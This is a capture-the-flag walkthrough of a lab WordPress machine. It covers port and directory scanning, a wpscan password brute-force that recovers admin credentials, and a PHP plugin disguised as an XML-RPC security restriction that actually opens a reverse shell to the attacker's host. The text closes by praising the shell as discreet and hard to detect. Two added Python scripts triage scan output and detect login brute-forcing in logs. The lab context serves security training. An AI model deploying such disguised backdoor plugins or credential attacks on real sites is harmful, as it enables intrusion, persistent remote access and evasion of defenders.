MACHINE BAD PLUGIN
BAD PLUGIN
┌──(kali㉿kali)-[~/Descargas/badplugin]
└─$ sudo bash auto_deploy.sh badplugin.tar
[sudo] contraseña para kali:
## .
## ## ## ==
## ## ## ## ===
/""""""""""""""""\___/ ===
~~~ {~~ ~~~~ ~~~ ~~~~ ~~ ~ / ===- ~~~
\______ o __/
\ \ __/
\____\______/
___ ____ ____ _ _ ____ ____ _ ____ ___ ____
| \ | | | |_/ |___ |__/ | |__| |__] [__
|__/ |__| |___ | \_ |___ | \ |___ | | |__] ___]
Estamos desplegando la máquina vulnerable, espere un momento.
422be289323d1e2ca6c8cc98917c0d8ab6bc951313d09c8002a5c82bfb8c0ddd
Máquina desplegada, su dirección IP es --> 192.168.1.100
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 80 (HTTP) was open.
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -sS 192.168.1.100 -vvv 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-08 14:13 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 14:13
Scanning 192.168.1.100 [1 port]
Completed ARP Ping Scan at 14:13, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:13
Scanning 192.168.1.100 [65535 ports]
Discovered open port 80/tcp on 192.168.1.100
Completed SYN Stealth Scan at 14:13, 0.72s elapsed (65535 total ports)
Initiating Service scan at 14:13
Scanning 1 service on 192.168.1.100
Completed Service scan at 14:14, 6.03s elapsed (1 service on 1 host)
NSE: Script scanning 192.168.1.100.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 14:14
Completed NSE at 14:14, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 14:14
Completed NSE at 14:14, 0.01s elapsed
Nmap scan report for 192.168.1.100
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-11-08 14:13:58 CET for 7s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.58 ((Ubuntu))
MAC Address: 02:42:C0:A8:01:64 (Unknown)
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.27 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
Next, dirb was run against the web server to enumerate its directories and files; the findings (an exposed info.php, a phpMyAdmin install, a WordPress install and several listable directories) are shown below.
┌──(root㉿kali)-[/home/kali]
└─# dirb "http://192.168.1.100/"
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 8 14:15:07 2025
URL_BASE: http://192.168.1.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.100/ ----
+ http://192.168.1.100/index.html (CODE:200|SIZE:1960)
+ http://192.168.1.100/info.php (CODE:200|SIZE:87273)
==> DIRECTORY: http://192.168.1.100/javascript/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/
+ http://192.168.1.100/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.100/wordpress/
---- Entering directory: http://192.168.1.100/javascript/ ----
==> DIRECTORY: http://192.168.1.100/javascript/jquery/
---- Entering directory: http://192.168.1.100/phpmyadmin/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/doc/
+ http://192.168.1.100/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.1.100/phpmyadmin/index.php (CODE:200|SIZE:18605)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/
+ http://192.168.1.100/phpmyadmin/libraries (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/
+ http://192.168.1.100/phpmyadmin/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/sql/
+ http://192.168.1.100/phpmyadmin/templates (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/
---- Entering directory: http://192.168.1.100/wordpress/ ----
+ http://192.168.1.100/wordpress/index.php (CODE:200|SIZE:168442)
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-includes/
+ http://192.168.1.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.1.100/javascript/jquery/ ----
+ http://192.168.1.100/javascript/jquery/jquery (CODE:200|SIZE:289782)
---- Entering directory: http://192.168.1.100/phpmyadmin/doc/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/doc/html/
---- Entering directory: http://192.168.1.100/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/config/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/vendor/
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ar/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/az/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/be/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/bg/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ca/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/cs/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/da/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/de/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/el/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/es/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/et/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/fi/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/fr/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/gl/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/hu/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ia/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/id/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/it/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ja/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ko/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/nl/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/pl/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/pt/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/pt_BR/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ro/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/ru/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/si/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/sk/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/sl/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/sq/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/sv/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/tr/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/uk/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/vi/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/zh_CN/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/locale/zh_TW/
---- Entering directory: http://192.168.1.100/phpmyadmin/sql/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/themes/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/
---- Entering directory: http://192.168.1.100/wordpress/wp-admin/ ----
+ http://192.168.1.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/includes/
+ http://192.168.1.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-admin/user/
---- Entering directory: http://192.168.1.100/wordpress/wp-content/ ----
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/cache/
+ http://192.168.1.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/languages/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.1.100/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.1.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/phpmyadmin/doc/html/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/doc/html/_images/
---- Entering directory: http://192.168.1.100/phpmyadmin/js/config/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/database/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/server/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/setup/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/table/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/transformations/
---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/database/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/server/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/setup/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/table/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/transformations/
---- Entering directory: http://192.168.1.100/phpmyadmin/js/vendor/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/vendor/jquery/
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ar/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/az/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/be/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/bg/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ca/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/cs/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/da/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/de/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/el/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/es/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/et/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/fi/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/fr/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/gl/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/hu/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ia/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/id/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/it/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ja/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ko/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/nl/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/pl/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/pt/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/pt_BR/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ro/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/ru/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/si/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/sk/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/sl/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/sq/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/sv/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/tr/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/uk/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/vi/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/zh_CN/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/locale/zh_TW/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/css/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/img/
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/jquery/
---- Entering directory: http://192.168.1.100/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-admin/network/ ----
+ http://192.168.1.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.100/wordpress/wp-admin/user/ ----
+ http://192.168.1.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.1.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.1.100/wordpress/wp-content/cache/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-content/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-content/plugins/ ----
+ http://192.168.1.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.100/wordpress/wp-content/themes/ ----
+ http://192.168.1.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.100/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/phpmyadmin/doc/html/_images/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/database/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/server/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/dist/server/status/
---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/setup/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/table/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/transformations/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/database/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/server/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/js/src/server/status/
---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/setup/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/table/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/transformations/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/vendor/jquery/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/css/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/img/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/jquery/ ----
==> DIRECTORY: http://192.168.1.100/phpmyadmin/themes/original/jquery/images/
---- Entering directory: http://192.168.1.100/phpmyadmin/js/dist/server/status/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/js/src/server/status/ ----
---- Entering directory: http://192.168.1.100/phpmyadmin/themes/original/jquery/images/ ----
-----------------
END_TIME: Sat Nov 8 14:16:41 2025
DOWNLOADED: 350512 - FOUND: 20
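Reading a dirb run this long by eye is error-prone, so the following added example (my own code, not part of the original write-up or the dirb project) parses dirb's text output and turns it into a severity-ranked list of exposures. The severity rules in RULES are my own assumptions about what matters on a WordPress host; the sample input is a constructed subset of the output above.

```python
import re
from dataclasses import dataclass

# Constructed sample: a subset of the dirb output lines shown above.
SAMPLE_DIRB_OUTPUT = """\
+ http://192.168.1.100/index.html (CODE:200|SIZE:1960)
+ http://192.168.1.100/info.php (CODE:200|SIZE:87273)
==> DIRECTORY: http://192.168.1.100/phpmyadmin/
+ http://192.168.1.100/server-status (CODE:403|SIZE:278)
==> DIRECTORY: http://192.168.1.100/wordpress/
+ http://192.168.1.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.1.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
---- Entering directory: http://192.168.1.100/phpmyadmin/js/ ----
"""

FILE_RE = re.compile(r"^\+ (?P<url>\S+) \(CODE:(?P<code>\d+)\|SIZE:(?P<size>\d+)\)$")
DIR_RE = re.compile(r"^==> DIRECTORY: (?P<url>\S+)$")
ENTER_RE = re.compile(r"^---- Entering directory: (?P<url>\S+) ----$")
LISTABLE_RE = re.compile(r"^\(!\) WARNING: Directory IS LISTABLE")

# Triage rules (my own assumptions, not part of dirb): URL fragment -> (severity, reason)
RULES = {
    "info.php": ("high", "phpinfo() page leaks server configuration"),
    "/phpmyadmin/": ("high", "database admin console reachable from the network"),
    "xmlrpc.php": ("medium", "XML-RPC endpoint reachable; disable it if unused"),
    "readme.html": ("low", "WordPress readme discloses the version"),
}


@dataclass
class Finding:
    url: str
    severity: str
    reason: str


def parse_dirb(text):
    """Return (files, directories, listable_dirs) from dirb's text output."""
    files, dirs, listable = [], [], []
    current_dir = None
    for line in text.splitlines():
        line = line.strip()
        if m := FILE_RE.match(line):
            files.append((m["url"], int(m["code"]), int(m["size"])))
        elif m := DIR_RE.match(line):
            dirs.append(m["url"])
        elif m := ENTER_RE.match(line):
            current_dir = m["url"]          # the warning that follows refers to this dir
        elif LISTABLE_RE.match(line) and current_dir:
            listable.append(current_dir)
    return files, dirs, listable


def _apply_rules(url):
    return [Finding(url, sev, reason) for frag, (sev, reason) in RULES.items() if frag in url]


def triage(text):
    """Turn dirb output into a severity-ranked list of exposures."""
    files, dirs, listable = parse_dirb(text)
    findings = [Finding(url, "medium", "directory listing enabled") for url in listable]
    for url, code, _size in files:
        if code == 403:                     # exists but is not exposed; skip
            continue
        findings.extend(_apply_rules(url))
    reported = set()
    for url in dirs:                        # one finding per rule for a directory tree
        for f in _apply_rules(url):
            if f.reason not in reported:
                reported.add(f.reason)
                findings.append(f)
    order = {"high": 0, "medium": 1, "low": 2}
    return sorted(findings, key=lambda f: order[f.severity])


if __name__ == "__main__":
    for f in triage(SAMPLE_DIRB_OUTPUT):
        print(f"[{f.severity}] {f.url}: {f.reason}")
```

On the sample above this yields two high findings (info.php and /phpmyadmin/) and three medium ones (the two listable directories and xmlrpc.php); feed it the full output of a real run with `triage(open("dirb.txt").read())`.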
┌──(root㉿kali)-[/home/kali]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.100 escolares.dl
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
http://192.168.1.100/wordpress/wp-admin/
http://escolares.dl/wordpress/xmlrpc.php
http://192.168.1.100/wordpress/wp-admin/
http://escolares.dl/wordpress/wp-login.php?redirect_to=http%3A%2F%2F192.168.1.100%2Fwordpress%2Fwp-admin%2F&reauth=1
http://escolares.dl/wordpress/wp-login.php
Since there is a login panel, we try to obtain the credentials with a dictionary attack against the admin user, as shown below.
└─# wpscan --url "http://escolares.dl/wordpress/wp-login.php" -U admin -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.28
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://escolares.dl/wordpress/wp-login.php/ [192.168.1.100]
[+] Started: Sat Nov 8 14:24:56 2025
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.58 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://escolares.dl/wordpress/wp-login.php/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] This site seems to be a multisite
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| Reference: http://codex.wordpress.org/Glossary#Multisite
[+] The external WP-Cron seems to be enabled: http://escolares.dl/wordpress/wp-login.php/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.7.1 identified (Insecure, released on 2024-11-21).
| Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://escolares.dl/wordpress/wp-includes/css/dashicons.min.css?ver=6.7.1
| Confirmed By:
| Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://escolares.dl/wordpress/wp-includes/css/buttons.min.css?ver=6.7.1
| - http://escolares.dl/wordpress/wp-includes/js/wp-util.min.js?ver=6.7.1
| Query Parameter In Install Page (Aggressive Detection)
| - http://escolares.dl/wordpress/wp-includes/css/dashicons.min.css?ver=6.7.1
| - http://escolares.dl/wordpress/wp-includes/css/buttons.min.css?ver=6.7.1
| - http://escolares.dl/wordpress/wp-admin/css/forms.min.css?ver=6.7.1
| - http://escolares.dl/wordpress/wp-admin/css/l10n.min.css?ver=6.7.1
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:19 <====================> (137 / 137) 100.00% Time: 00:00:19
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / rockyou
Trying admin / abc123 Time: 00:00:00 < > (10 / 14344402) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: rockyou
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 8 14:25:27 2025
[+] Requests Done: 345
[+] Cached Requests: 4
[+] Data Sent: 101.104 KB
[+] Data Received: 24.142 MB
[+] Memory used: 268.695 MB
[+] Elapsed time: 00:00:30
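A run like the one above leaves a very recognisable trace in the web server's access log: a burst of POST requests to wp-login.php from one address, each answered with 200 (WordPress re-renders the form on a wrong password), and finally a 302 redirect once a guess succeeds. The following added example (my own code, not from the original post or from WPScan) detects that pattern over Apache combined-format lines. The log lines are constructed samples, and the 200/302 heuristic assumes a stock wp-login.php with no plugin altering its responses.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def _mk(ip, ts, method, path, status, ua):
    """Build one constructed Apache combined-format line (sample data, not a real log)."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0 "-" "{ua}"'


# Constructed sample: twelve failed POSTs in twelve seconds from one address, then a
# successful one, plus an ordinary user logging in from another address.
SAMPLE_LOG_LINES = (
    [_mk("192.168.1.1", f"08/Nov/2025:14:25:{s:02d} +0100", "POST",
         "/wordpress/wp-login.php", 200, "WPScan v3.8.28") for s in range(1, 13)]
    + [_mk("192.168.1.1", "08/Nov/2025:14:25:13 +0100", "POST",
           "/wordpress/wp-login.php", 302, "WPScan v3.8.28")]
    + [_mk("192.168.1.50", "08/Nov/2025:14:26:05 +0100", "POST",
           "/wordpress/wp-login.php", 302, "Mozilla/5.0")]
    + [_mk("192.168.1.50", "08/Nov/2025:14:26:06 +0100", "GET",
           "/wordpress/wp-admin/", 200, "Mozilla/5.0")]
)


def detect_login_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: alert} for addresses with >= threshold failed wp-login.php POSTs
    inside any window of the given length.

    Heuristic: a wrong password makes wp-login.php answer 200 (the form again),
    a correct one answers 302, so a burst of 200s followed by a 302 is the
    signature of a guessing run that succeeded.
    """
    events = defaultdict(list)            # ip -> [(timestamp, status, user_agent)]
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or not m["path"].endswith("/wp-login.php"):
            continue
        events[m["ip"]].append((datetime.strptime(m["ts"], TS_FMT), int(m["status"]), m["ua"]))

    alerts = {}
    for ip, evs in events.items():
        evs.sort(key=lambda e: e[0])
        failures = [ts for ts, status, _ in evs if status == 200]
        peak, start = 0, 0
        for end in range(len(failures)):  # sliding window over the failed attempts
            while failures[end] - failures[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            last_failure = failures[-1]
            alerts[ip] = {
                "failed_attempts": peak,
                "success_after_failures": any(
                    status == 302 and ts >= last_failure for ts, status, _ in evs),
                "user_agents": sorted({ua for _, _, ua in evs}),
            }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_login_bruteforce(SAMPLE_LOG_LINES).items():
        print(ip, alert)
```

The `success_after_failures` flag is the one to page on: a burst of failures alone is noise, a burst followed by a redirect means a password was found and the account should be reset. Real runs pass `open("/var/log/apache2/access.log")` as `lines`; tune `threshold` and `window` to the site's normal login rate.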
┌──(root㉿kali)-[/home/kali]
└─# nano reverse.php
<?php
/*
Plugin Name: Restrict XMLRPC Access
Plugin URI: https://elrincondelhacker.es/
Description: Restringe el acceso al archivo xmlrpc.php para aumentar la seguridad.
Version: 1.0
Author: El Pinguino de Mario
Author URI: https://elpinguinodemario.es/
License: GPL2
*/
function restrict_xmlrpc_access() {
    if (strpos($_SERVER['REQUEST_URI'], 'xmlrpc.php') !== false) {
        header('HTTP/1.1 403 Forbidden');
        echo 'Cuidadito cuidadín, te pillé leyendo lo que no debías pillín.';
        // Reverse connection settings
        $config = [
            'ip' => '192.168.1.1',   // attacker's IP
            'port' => 443,           // attacker's listening port
            'chunk_size' => 1400
        ];
        // Open the socket connection
        $sock = @fsockopen($config['ip'], $config['port'], $errno, $errstr, 30);
        if (!$sock) {
            error_log("ERROR: No se pudo conectar a {$config['ip']}:{$config['port']} - $errstr ($errno)");
            exit(1);
        }
        // Spawn a shell with its input/output redirected to the socket
        $process = proc_open('/bin/sh -i', [
            0 => $sock, // standard input
            1 => $sock, // standard output
            2 => $sock  // standard error
        ], $pipes);
        if (!is_resource($process)) {
            error_log("ERROR: No se pudo abrir la shell.");
            fclose($sock);
            exit(1);
        }
        // Handle the data exchange
        stream_set_blocking($sock, 0);
        while ($data = fread($sock, $config['chunk_size'])) {
            fwrite($sock, $data);
        }
        // Release resources
        fclose($sock);
        proc_close($process);
        exit;
    }
}
add_action('init', 'restrict_xmlrpc_access');
Improvements made:
Configuration in an array: I moved the reverse-connection settings into a $config array for better organisation and easier modification.
Improved error handling: more descriptive error messages have been added to make diagnosing a failure easier.
Stream blocking: I added stream_set_blocking($sock, 0); so that reads from the socket are non-blocking, which improves the script's efficiency and responsiveness.
Optimised communication loop: the data-exchange loop has been simplified and optimised to better handle the flow of data between the socket and the shell.
This code should be more efficient and discreet, making it easier to carry out your attack without being easily detected.
